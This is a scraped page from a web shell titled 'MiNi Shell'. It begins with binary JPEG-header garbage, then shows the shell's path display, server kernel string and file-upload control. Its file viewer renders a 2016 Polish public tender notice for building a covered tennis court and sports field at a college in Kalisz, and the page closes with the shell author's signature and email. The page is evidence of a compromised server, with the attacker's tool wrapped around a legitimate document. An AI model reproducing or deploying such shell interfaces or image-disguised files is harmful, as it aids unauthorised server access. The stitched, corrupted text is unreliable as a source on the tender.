JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160615/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160615/86833-N-2016.html

<p class="kh_header"><b>Kalisz: Budowa zadaszonego kortu tenisowego wraz z boiskiem wielofunkcyjnym oraz zapleczem socjalnym w Kaliszu przy ul. Poznańskiej 201-205</b><br>
<b>Numer ogłoszenia: 86833 - 2016; data zamieszczenia: 15.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 62 767 95 00, 767 95 32, faks 62 767 95 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zadaszonego kortu tenisowego wraz z boiskiem wielofunkcyjnym oraz zapleczem socjalnym w Kaliszu przy ul. Poznańskiej 201-205.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na   budowie zadaszonego kortu tenisowego wraz z boiskiem wielofunkcyjnym oraz zapleczem socjalnym w Kaliszu przy ul. Poznańskiej 201-205.
2.Zakres przedmiotu zamówienia, zgodnie z wymogami określonym w przedmiarach robót i projekcie budowlanym, które stanowią załącznik do niniejszej SIWZ, obejmuje wykonanie, w szczególności:
2.1. budynek zaplecza socjalnego ; roboty budowlane -roboty ziemne, fundamenty,  konstrukcja nadziemia, strop nad parterem, stropodach, stolarka i ślusarka otworowa, tynki wewnętrzne, posadzki, roboty malarskie i glazurnicze, sufity podwieszane, elewacja; instalacje sanitarne - wewnętrzna instalacja c.o., instalacja wod.-kan.,
 Zadaszony kort tenisowy; roboty ziemne, fundamenty, obudowa hali namiotowej, posadzka, zagospodarowanie terenu,wyposażenie zadaszonego kortu tenisowego,
2.2	roboty sanitarne - przełożenie sieci  wodociągowej, przyłącze wodociągowe,  kanalizacja sanitarna, instalacja c.o., wewnętrzna instalacja wodociągowa,, wewnętrzna instalacja kanalizacyjna,  technologia kotłowni grzewczej,, instalacja gazowa, przełożenie gazociągu,
2.3.	instalacje elektryczne - instalacja elektryczna wewnętrzna + zalicznikowa linia zasilająca.
3. Szczegółowy zakres prac i opis przedmiotu zamówienia określony jest w  załącznikach do SIWZ, obejmujących : 
3.1 projekt budowlano-wykonawczy  - załącznik nr 2 do SIWZ ,
3.2 przedmiary robót    - załącznik nr 3 do SIWZ ,
3.3 specyfikacja techniczna wykonania i odbioru robót  - załącznik nr 4 do SIWZ. 
   W razie sprzeczności w dokumentacji należy przyjąć, że właściwy zakres robót zawarty jest  w przedmiarze robót.
4. Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do wykonania  wszelkich robót przygotowawczych, porządkowych, utrzymania zaplecza budowy,  dokumentacji  powykonawczej i inne związane z odbiorami oraz innych czynności niezbędnych do wykonania przedmiotu zamówienia, w tym roboty konieczne , o ile zajdzie taka potrzeba, na  skutek sytuacji niemożliwej  wcześniej do przewidzenia (na podstawie art. 67 ust.1 pkt.5 ustawy).
5. Zamawiający wymaga udzielenia gwarancji i rękojmi na wykonany przedmiot zamówienia na okres nie krótszy niż 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego,
6.	 Wykonawca przy realizacji przedmiotu zamówienia zobowiązany będzie do stosowania  jedynie wyrobów dopuszczonych do obrotu i używania w budownictwie, w rozumieniu  ustawy z dnia  7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2013 r. poz.984 z późn. zm.), ustawy o wyrobach  budowlanych ( t.j. Dz. U. z 2004 r. Nr 92, poz.881 ze zm.) oraz  innych  przepisów, o ile mają zastosowanie. Zastosowane materiały (wyroby) muszą posiadać odpowiednie atesty, certyfikaty, deklaracje  zgodności lub certyfikat zgodności z Polską Normą lub  aprobatę techniczną. Powyższe dokumenty należy dołączyć do dokumentów odbiorowych .
7. Zawarte w  załącznikach ( pkt.3.3.) do niniejszej SIWZ nazwy materiałów, producentów, czy znaków towarowych podano jako przykładowe, określające standard techniczny i jakościowy  oraz mające na celu doprecyzowanie przedmiotu zamówienia . Materiały do wykonania zamówienia należy przyjmować w kategorii i jakości nie niższej (równoważne) niż te wskazane w SIWZ i załącznikach do niej.
8. Wykonawca odpowiedzialny jest za powstałe w toku własnych prac odpady oraz za
 właściwy sposób postępowania z nimi, zgodnie z przepisami ustawy z dnia 27 kwietnia 2001 r. o odpadach ( Dz. U. z 2010 r., nr 185, poz.1243) oraz ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku  w gminach ( Dz. U. Z 2005 r., Nr 236, poz.2007 z późn. zm.). Wywóz odpadów budowlanych odbywa się  na koszt Wykonawcy.  
 9. Roboty będą  wykonywane na terenie czynnym Uczelni - Wydział Rehabilitacji i Sportu  i Wydział Politechniczny..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.33.00.00-9, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 175.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca zobowiązany jest do wniesienia wadium w wysokości 50.000,00  złotych  (słownie: pięćdziesiąt  tysięcy złotych 00/100), przed upływem terminu  składania ofert.
2. Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art.45 ust.6 ustawy tj. :  a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,  c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych,  e) poręczeniach udzielonych przez podmioty, o których mowa w art.6 b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości ( Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
 3. Wadium w pieniądzu (złotych polskich) należy wnieść przelewem na  rachunek bankowy Zamawiającego: Bank PKO S.A. 38124066091111000049332212 z dopiskiem  Wadium  nr sprawy : III/DT/23110/Pn-6/2016. Wniesienie  wadium w pieniądzu będzie skuteczna, jeżeli przed upływem terminu składania ofert ( dzień i godzina przewidziana na składanie ofert) znajdzie się na rachunku bankowym Zamawiającego. Dokument potwierdzający wniesienie wadium należy załączyć do oferty  .  
 4. W przypadku wnoszenia wadium w innych formach niż pieniężna  oryginał dokumentu  należy włożyć do koperty z ofertą  w osobnej koszulce / kopercie ( nie wpinać trwale do oferty), a jego kopię należy wpiąć do oferty. Kserokopia ta winna być poświadczona za zgodność z oryginałem przez osoby uprawnione do  reprezentowania Wykonawcy, jak w pkt.10.8  SIWZ.   
5. Wykonawca , który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną forma wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6. W przypadku składania  przez Wykonawcę wadium w formie gwarancji, poręczenia, to z ich treści musi jednoznacznie wynikać : nazwa zlecającego, beneficjenta gwarancji, gwaranta wraz z adresami ich siedzib, określenie wierzytelności, która ma być zabezpieczona gwarancją ; kwota gwarancji; termin ważności gwarancji, bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze  pisemne żądanie Zamawiającego w przypadku zaistnienia przesłanek, o których mowa w  art. 46 ust.4a i ust 5 ustawy.
7. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na
poczet zabezpieczenia należytego wykonania umowy określa ustawa 
8.  Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych 
 w ustawie -  art.46 ust.4a i ust.5 ustawy .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego  warunku w tym zakresie. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia tego warunku wykażą wykonanie  tj. zakończenie  w 
okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch sportowych  obiektów budowlanych odpowiadających swoim rodzajem z robotami  stanowiącymi 
przedmiot zamówienia, w tym : 
a) zadaszonym obiektem sportowym wykonanym w formie lekkiej zabudowy namiotowej; 
i
b)  obiektem sportowym kubaturowym w którym wykonano nawierzchnię sportową 
akrylową lub inną syntetyczną na podłożu betonowym;
każdy z ww. obiektów o wartości robót większej niż 2.000.000,00 zł brutto i wykonany
w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony;
Zamawiający uznaje za wystarczające wskazanie w wykazie, o którym mowa w pkt. 9.1.2) SIWZ tylko takich robót budowlanych, które potwierdzą spełnianie  warunków, o których mowa w pkt. 8.1.1. ppkt.2) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego  warunku w tym zakresie. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia tego warunku Wykonawca musi wykazać, że dysponuje 
lub będzie dysponował osobami legitymującymi się kwalifikacjami  zawodowymi,
doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im 
powierzone. Wykonawca przedstawi w ofercie kandydatów na każde stanowisko wymienione poniżej ;
a)kierownik budowy - jedna osoba, posiadającą uprawnienia  budowlane  do 
 kierowania robotami budowlanymi , w specjalności konstrukcyjno - budowlanej,
 w zakresie  niezbędnym do wykonania  przedmiotu zamówienia lub odpowiadające
  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej 
obowiązujących przepisów w tym zakresie.
b)	kierownik robót, który posiada uprawnienia budowlane do kierowania robotami 
    o specjalności instalacyjnej w zakresie, instalacji i urządzeń cieplnych, 
    wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych , w  zakresie 
    niezbędnym do wykonania  przedmiotu zamówienia lub odpowiadające im ważne 
    uprawnienia budowlane, które zostały wydane na podstawie wcześniej
    obowiązujących przepisów w tym  zakresie.
c)	kierownik robót ,  który posiada uprawnienia  budowlane  do kierowania 
     robotami o specjalności instalacyjnej w  zakresie, instalacji i urządzeń   
     elektrycznych , w  zakresie  niezbędnym do wykonania  przedmiotu  zamówienia 
     lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 
     podstawie wcześniej  obowiązujących przepisów w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego  warunku w tym zakresie. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dowód wniesienia wadium, o którym mowa w pkt.7 niniejszej SIWZ,
2. kosztorysy  ofertowe opracowane zalecaną metodą kalkulacji uproszczonej  oraz 
zaleca się - zestawienie wszystkich kosztorysów ofertowych , w podziale na branże.
3. stawek roboczogodzin, narzutów procentowych, które zostały przyjęte do wyceny robót,
4.  zestawienie   M- materiałów, S -  sprzętu wraz z ich cenami jednostkowymi. 
Informacje, o których mowa w ppkt. 3 i 4 mogą zostać zawarte w kosztorysie ofertowym.
5. w przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
       o którym  mowa w ppkt.10.2. lit.b) lub ppkt. 10.10. - SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Warunki gwarancji i rękojmi - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić  za zgodą obu stron  wyrażoną  na piśmie  w formie  aneksu do umowy, pod rygorem nieważności takiej zmiany i mogą zostać dokonane,  o ile nie stoją w sprzeczności z regulacjami zawartymi w  ustawie Prawo zamówień publicznych.     
2. Zamawiający przewiduje możliwość  zmian postanowień zawartej umowy stosunku do treści  oferty, na  podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co  najmniej jednej z okoliczności wskazanych poniżej, z uwzględnieniem podawanych  warunków   ich wprowadzenia :
1)zmiana terminu realizacji przedmiotu umowy;
  a) wystąpienia robót zamiennych , dodatkowych , o których mowa w § 1 ust.4
  b) zachodzić będzie konieczność udzielenia zamówień dodatkowych  na podstawie  art. 67  ust.1 pkt.5 ustawy,
 c) okoliczności siły wyższej, tj. wskutek wystąpienia zdarzenia losowego wywołanego 
przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w 
szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego
powstaniem szkody  w znacznych rozmiarach,
 d) wystąpienia okoliczności, których strony nie były w stanie przewidzieć i im zapobiec pomimo zachowania należytej staranności, e) wystąpi konieczność wstrzymania robót z przyczyn niezależnych od Wykonawcy, np.  technicznych albo organizacyjnych- zależnych  od Zamawiającego.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 ppkt. a) - e)
 termin wykonania umowy może ulec  odpowiedniemu przedłużeniu, o czas niezbędny do  zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż 
 o okres trwania tych okoliczności.
2)	zmiany w zakresie sposobu i zakresu wykonania przedmiotu umowy w następujących  sytuacjach: 
         a)  konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań  technicznych lub materiałowych ze względu na zmiany obowiązującego prawa lub  wytyczne wydane przez uprawniony organ oraz  w przypadku o którym mowa w § 1 ust.4-6 niniejszej umowy,    
    3) zmiana ceny w przypadku zmiany ustawowej stawki podatku VAT,  przy czym zmianie  ulegnie jedynie   cena  brutto( cena netto bez zmian) lub w przypadku , o którym mowa w § 1 ust.4 umowy.
    
3. Wszystkie powyższe postanowienia, o których mowa w ust.2 stanowią katalog zmian na które 
     Zamawiający  może wyrazić zgodę. Nie stanowią  jednocześnie zobowiązania do wyrażenia 
     takiej zgody. W celu dokonania zmian zapisów umowy wnioskowanych  przez stronę, 
     zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich 
      uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl / biuletyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła  Zawodowa  im. Prezydenta Stanisława  Wojciechowskiego 
w Kaliszu, ul. Nowy Świat 5 - Dział Techniczny,  62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 11:00, miejsce: Państwowa Wyższa Szkoła  Zawodowa  im. Prezydenta Stanisława  Wojciechowskiego 
w Kaliszu, ul. Nowy Świat 5 - Dział Techniczny,I piętro, pokój 15  62-800 Kalisz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com